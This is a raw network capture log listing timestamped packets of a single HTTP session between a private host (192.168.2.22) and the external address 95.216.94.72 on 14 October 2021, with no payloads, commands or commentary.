Oct 14, 2021 10:34:58.531393051 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531397104 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531419992 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531430960 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531443119 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531478882 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531554937 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531594992 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531631947 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531637907 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531660080 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531682014 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531703949 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531729937 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531760931 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531778097 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531821012 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531845093 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531847954 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531861067 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531877995 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531887054 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531914949 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531925917 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531963110 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531969070 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531985044 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532001019 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532026052 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532038927 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532079935 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532094955 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532099009 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532143116 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532176018 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532179117 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532212019 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532217026 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532243967 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532254934 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532258987 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532275915 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532305956 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532321930 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532345057 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532362938 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532382011 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532412052 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532428980 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532444000 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532470942 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532495022 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532507896 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532522917 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532546043 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532562017 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532594919 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532617092 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532644987 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532686949 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532725096 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532741070 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.532752991 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.532825947 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.533242941 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.533308983 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.533349037 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.533386946 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.533396959 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.533425093 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.533442020 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.533463001 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.533492088 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.533509970 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.533512115 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.533551931 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.533588886 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.533615112 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.533639908 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.533699989 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.533727884 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.569228888 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569299936 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569349051 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569397926 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569444895 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569499016 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569550991 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569597006 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569644928 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569694042 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569742918 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569791079 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569839001 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569894075 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569945097 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.569993019 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570040941 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570089102 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570133924 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570182085 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570229053 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570281982 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570332050 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570379019 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570426941 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570475101 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570521116 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570569038 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570617914 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570671082 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570722103 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570769072 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570816994 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570863962 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570909977 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570966005 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.570965052 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571027040 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571033001 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571078062 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571096897 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571098089 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571177959 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571223974 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571283102 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571326017 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571340084 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571396112 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571448088 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571449995 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571468115 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571479082 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571495056 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571508884 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571543932 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571563959 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571594000 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571609020 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571646929 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571701050 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571747065 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571753025 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571782112 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571788073 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571791887 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571794987 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571845055 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571855068 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571891069 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571904898 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571939945 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.571945906 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.571989059 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572001934 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572043896 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572051048 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572094917 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572102070 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572143078 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572158098 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572191954 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572205067 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572241068 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572256088 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572288036 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572303057 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572336912 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572344065 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572385073 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572447062 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572447062 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572505951 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572511911 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572515011 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572573900 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572613955 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572634935 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572639942 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572694063 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572712898 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572743893 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572747946 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572793007 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572802067 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572840929 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572901011 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572901011 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.572954893 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.572963953 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.573054075 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573108912 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573154926 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.573168993 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573172092 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.573230028 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573276997 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.573288918 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573296070 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.573348999 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573354006 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.573416948 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573421001 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.573479891 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573532104 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573580027 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573626995 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573673964 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573721886 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573767900 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573821068 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573873997 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573914051 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573955059 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.573993921 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574033976 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574073076 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574119091 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574171066 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574210882 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574249029 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574287891 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574328899 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574369907 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574408054 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574446917 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574486017 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574526072 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574563026 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574601889 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574635983 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.574642897 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574685097 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574724913 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574764967 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574805021 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.574810028 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574861050 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574904919 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.574956894 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575006008 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575052977 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575100899 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575184107 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575232983 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575278997 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575330973 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575381994 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575436115 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575485945 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575532913 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575583935 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575634003 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575681925 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575731993 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575781107 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575834990 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575886965 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.575942993 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.576001883 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.576052904 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.576100111 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.576155901 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.576183081 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.576190948 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.576194048 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.576210976 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.576230049 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.576257944 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.576267004 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.576328039 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.576375961 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.581165075 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.582281113 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.615780115 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.615858078 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.615907907 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.615917921 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.615957022 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.615957022 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.615963936 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616003990 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616014957 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616056919 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616059065 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616111040 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616113901 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616158009 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616162062 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616206884 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616208076 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616256952 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616261005 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616303921 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616311073 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616353035 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616355896 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616400003 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616405964 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616451025 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616455078 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616506100 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616507053 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616553068 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616559982 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616600990 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616601944 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616650105 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616652966 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616695881 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616702080 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616743088 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616746902 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616796017 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616799116 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616849899 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616851091 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616898060 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616899967 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616946936 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616947889 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.616995096 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.616997004 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617042065 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617043018 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617090940 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617093086 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617177010 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617187023 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617224932 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617230892 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.617273092 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.617278099 CEST	49167	80	192.168.2.22	95.216.94.72
